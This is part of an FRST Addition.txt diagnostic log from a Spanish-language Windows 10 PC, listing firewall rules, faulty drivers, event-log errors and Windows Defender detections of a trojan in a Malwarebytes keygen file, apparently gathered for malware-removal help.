FirewallRules: [{B61F9338-294C-4CF7-9AD6-243BEE4EE351}] => (Allow) D:\Juegos\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{45D6A164-E58C-48A2-A464-DED387B08DE7}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [UDP Query User{EC9D28C9-B34D-48B6-8515-10D9FB90B52E}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [TCP Query User{D4043931-292C-47D1-98AC-1063549292D5}D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{24A5229F-FAD8-4E4C-9831-530113382557}D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{899D2742-7CF3-4B47-A42F-F61C4B9310D9}D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{7C3C840F-01BB-4E88-B61D-10BAEFF01962}D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{30A020D3-8BF6-4EFA-A421-02E57FD6724F}D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{836A4D1E-D6FB-42E6-BBE4-B89D78EA5DC4}D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{34B6F701-F430-4CA1-A84C-B3E315ED2DC0}D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [UDP Query User{2D9B720D-034D-48ED-96F0-6407EC743D31}D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [TCP Query User{CDABA8E9-6D5C-4096-9002-5D17C19C1BC0}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe
FirewallRules: [UDP Query User{3E0FD960-C0AB-48BF-AD4E-9063D0AC21BE}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe
FirewallRules: [{FEDCAB75-ECB2-4995-97CE-872F5CD6D48E}] => (Allow) C:\Users\usuario\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{28CC0332-88E6-4CFB-A2E5-C803AC0071FC}] => (Allow) C:\Users\usuario\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6A0DED51-2BC7-48B4-88A4-16EF0C53CB89}] => (Allow) D:\Juegos\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{243AF38D-5D05-4574-AEBB-8D922898CCC0}] => (Allow) D:\Juegos\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{086EE174-2471-4893-9C17-DFB877B7300E}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{8DB92254-7206-463F-BA31-2C57D8B2884B}] => (Allow) C:\Program Files (x86)\Common Files\hAwYUAXJE.exe
FirewallRules: [{620DC558-02E7-4FB4-BA31-8AE4076F35EA}] => (Allow) C:\Program Files (x86)\Common Files\KIIa.exe
FirewallRules: [{660DB5A5-8D36-4EBC-9C9A-02307DD3C07F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FE15A139-801F-44D8-B203-467A7293F2E6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{15CF951D-2E5B-41E4-9766-AF4124D193EE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B00A7146-4CE2-481E-B420-25BA3F1ABD74}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A4595A2D-CB56-48C2-BB27-C9C27727E7D9}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{22B794D6-0E4F-4109-A5E5-49A2C58B1B4E}] => (Allow) D:\Juegos\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [{58E9EAC8-2CD9-4B28-A5A7-F5ECB327619A}] => (Allow) D:\Juegos\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [{587D86FA-308A-415B-BE21-4D9155FF1612}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3E2B0264-4169-4E5E-ABB1-957F5146A127}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{26B00B3C-4814-461B-8DBF-6A6073EEBB6D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AFDDA7BF-BF39-4020-8938-D1B0F7DB5574}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D9FA232C-99C9-4C7E-837B-449381083AFC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A6857F3A-4F49-4A1C-8164-6A92501EEB23}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{87930742-A469-449D-B908-42A6C247F678}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A1A6F06F-70FC-442A-930F-5B98553AE440}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5D56E9F8-8BDB-4CE7-A433-8DCF857CF027}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{92C2F840-4940-46BA-8BC5-68E54D604D0C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2DD6E0AB-FC29-4F05-AB0D-37142A00979B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E713EA5F-A4D3-42AE-AFE8-4D184FFB595B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{28668C0F-0D47-4A78-9580-498CB9FFC1E1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B1E3EC74-BAAF-484F-B8F6-3EAF6EB5B8EC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7BC2CD3F-6100-49EC-B7CD-DBB0F77B65F1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{B02B216E-6AB9-431E-A59E-4E0674C1D990}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{69B5221E-A10A-4E99-A8CA-0B0A91FBF20F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0BEEC454-BFF3-410D-A0F4-79ABE991B5E1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AD64422D-56DF-4397-85F0-9CFAF2179E52}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{3F612739-C19C-4CE0-941A-261C19EA1CA8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{349CCB18-CF4D-48C0-9F33-E8D742801BEC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C58544E0-6090-4007-99DD-CC39C4F51538}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{5967FB93-56CE-41CE-8516-3FFD846FD89E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E82FB505-9166-42D4-9D12-F9911AC650F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{697195C0-6027-4F4E-A81D-FFD7FF297BAA}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0EB9EB16-73BF-418F-A039-2134EE621618}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E8086A5C-5962-4DA1-84CC-F8D35410396B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AAD28ECE-20C4-48B9-8060-F950D2E1DD66}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{51751739-A6E0-4BFE-AC8D-1CD009A9BE1A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{02FD6A0F-9BBF-40AA-8CA0-AC970AC689C4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BAFC25AE-E034-497F-850B-71CD065A3436}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{860E9194-B479-424F-AF6C-0E05EEA3AF2B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4B146FEA-CC7E-466D-BD78-9AED0BD0C2A1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F96A86D7-2518-4962-87F2-5653F72FA5DE}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DA5875ED-5472-4993-8F8F-CE309465DCE5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D3E701A5-BB67-4357-B277-61826F0A5B3A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5722C095-053A-4509-99A4-206D959EFABA}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{5C065B2C-D690-44DD-BE13-32A8953B649E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EBEB5CD0-F706-4B2C-BD1F-40E8BBC0A69C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A2920824-FE10-45A5-A839-B2982871479C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0D59ED4F-8CD2-4C3D-8EF6-BCCE12CFE064}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9A68AE6E-429C-4721-97B2-300A67324EA4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C4C940A8-4CFB-4E85-8380-B0110040529E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{E2905067-D725-4300-867D-0ED9C2799199}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2A5C01EC-839C-4175-AD54-B1611F86EFC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CE815E3F-9942-4376-BEE6-89892AF5F5B3}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============

Name: AMD High Definition Audio Device
Description: AMD High Definition Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Advanced Micro Devices
Service: AtiHDAudioService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: TP-LINK Wireless USB Adapter
Description: TP-LINK Wireless USB Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TP-LINK
Service: RtlWlanu
Problem: : Windows cannot initialize the device driver for this hardware. (Code 37)
Resolution: The driver returned failure from its DriverEntry routine. Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.
Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: =========================

Application errors:
==================
Error: (11/24/2018 04:58:58 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.
Identificador de proceso: 220c
Hora de inicio: 01d48440c8d976a3
Hora de finalización: 4294967295
Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Identificador de informe: fa3bba61-0092-4775-bf37-cac6a84eafca
Nombre completo de paquete con errores:
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:38:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: rundll32.exe, versión: 10.0.17134.1, marca de tiempo: 0x1e3f5e34
Nombre del módulo con errores: MSE.Engine.dll_unloaded, versión: 12.17.1863.0, marca de tiempo: 0x2a425e19
Código de excepción: 0xc000041d
Desplazamiento de errores: 0x00023c04
Identificador del proceso con errores: 0xcb8
Hora de inicio de la aplicación con errores: 0x01d4843e1576d4a0
Ruta de acceso de la aplicación con errores: C:\Windows\SysWOW64\rundll32.exe
Ruta de acceso del módulo con errores: MSE.Engine.dll
Identificador del informe: 8002cd61-6718-46e3-b7bf-d1567ae6a08d
Nombre completo del paquete con errores:
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:38:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: rundll32.exe, versión: 10.0.17134.1, marca de tiempo: 0x1e3f5e34
Nombre del módulo con errores: KERNELBASE.dll, versión: 10.0.17134.407, marca de tiempo: 0xade8d4fe
Código de excepción: 0x0eedfade
Desplazamiento de errores: 0x00111812
Identificador del proceso con errores: 0xcb8
Hora de inicio de la aplicación con errores: 0x01d4843e1576d4a0
Ruta de acceso de la aplicación con errores: C:\Windows\SysWOW64\rundll32.exe
Ruta de acceso del módulo con errores: C:\Windows\System32\KERNELBASE.dll
Identificador del informe: af030c1f-f10e-4d58-8eaf-4586f529aed3
Nombre completo del paquete con errores:
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:38:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.
Identificador de proceso: 245c
Hora de inicio: 01d4843dde854c02
Hora de finalización: 4294967295
Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Identificador de informe: abab9884-c572-46c2-9cf7-76dacdc58bab
Nombre completo de paquete con errores:
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:33:45 PM) (Source: MsiInstaller) (EventID: 11704) (User: DESKTOP-CM2QFMQ)
Description: Product: Google Chrome -- Error 1704. An installation for vpohmnaghdlhgef is currently suspended. You must undo the changes made by that installation to continue. Do you want to undo those changes?

Error: (11/24/2018 04:32:26 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.
Identificador de proceso: ce8
Hora de inicio: 01d4843cc4e26f17
Hora de finalización: 4294967295
Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Identificador de informe: 898d6ac4-2462-4a8c-b3ee-6a7b8ae945c4
Nombre completo de paquete con errores:
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:26:09 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.
Identificador de proceso: 1480
Hora de inicio: 01d4843aec22e797
Hora de finalización: 4294967295
Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Identificador de informe: 882bf842-b89a-484e-a17c-f066627f2793
Nombre completo de paquete con errores:
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:15:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.
Identificador de proceso: 1764
Hora de inicio: 01d4843ac804132d
Hora de finalización: 4294967295
Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Identificador de informe: 90c38218-54f6-4e63-bb7d-df5467dd20bc
Nombre completo de paquete con errores:
Identificador de aplicación relativa del paquete con errores:

System errors:
=============
Error: (11/24/2018 06:06:11 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Error de DCOM "1084" al intentar iniciar el servicio EventSystem con argumentos "No disponible" para ejecutar el servidor: {1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (11/24/2018 06:06:08 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor: {DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:06:05 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio WSearch con argumentos "No disponible" para ejecutar el servidor: {9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (11/24/2018 06:06:02 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio WSearch con argumentos "No disponible" para ejecutar el servidor: {9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (11/24/2018 06:06:02 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor: {DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:05:54 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor: {DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:05:45 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor: {DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:05:12 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor: {DD522ACC-F821-461A-A407-50B198B896DC}

Windows Defender:
===================================
Date: 2018-11-24 17:05:45.373
Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 17:05:29.550
Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Protección en tiempo real
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: C:\Windows\System32\SearchProtocolHost.exe
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 16:53:59.719
Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe; process:_pid:3456,ProcessStart:131875700161562308
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 16:53:40.042
Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 16:52:33.686
Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Protección en tiempo real
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: C:\Windows\System32\SearchProtocolHost.exe
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 18:04:55.480
Description: La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 18:00:32.342
Description: La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 17:23:02.341
Description: La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 17:01:17.520
Description: La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 16:53:19.209
Description: La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

==================== Memory info ===========================

Processor: AMD Ryzen 5 2600 Six-Core Processor
Percentage of memory in use: 8%
Total physical RAM: 16335.12 MB
Available physical RAM: 15002.41 MB
Total Virtual: 21455.12 MB
Available Virtual: 20399.72 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.25 GB) (Free:66.33 GB) NTFS
Drive d: (Disco Local) (Fixed) (Total:931.51 GB) (Free:716.93 GB) NTFS

\\?\Volume{aa1afbd0-0000-0000-0000-100000000000}\ (Reservado para el sistema) (Fixed) (Total:0.54 GB) (Free:0.14 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 3E9A8BC4)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: AA1AFBD0)
Partition 1: (Active) - (Size=549 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.3 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================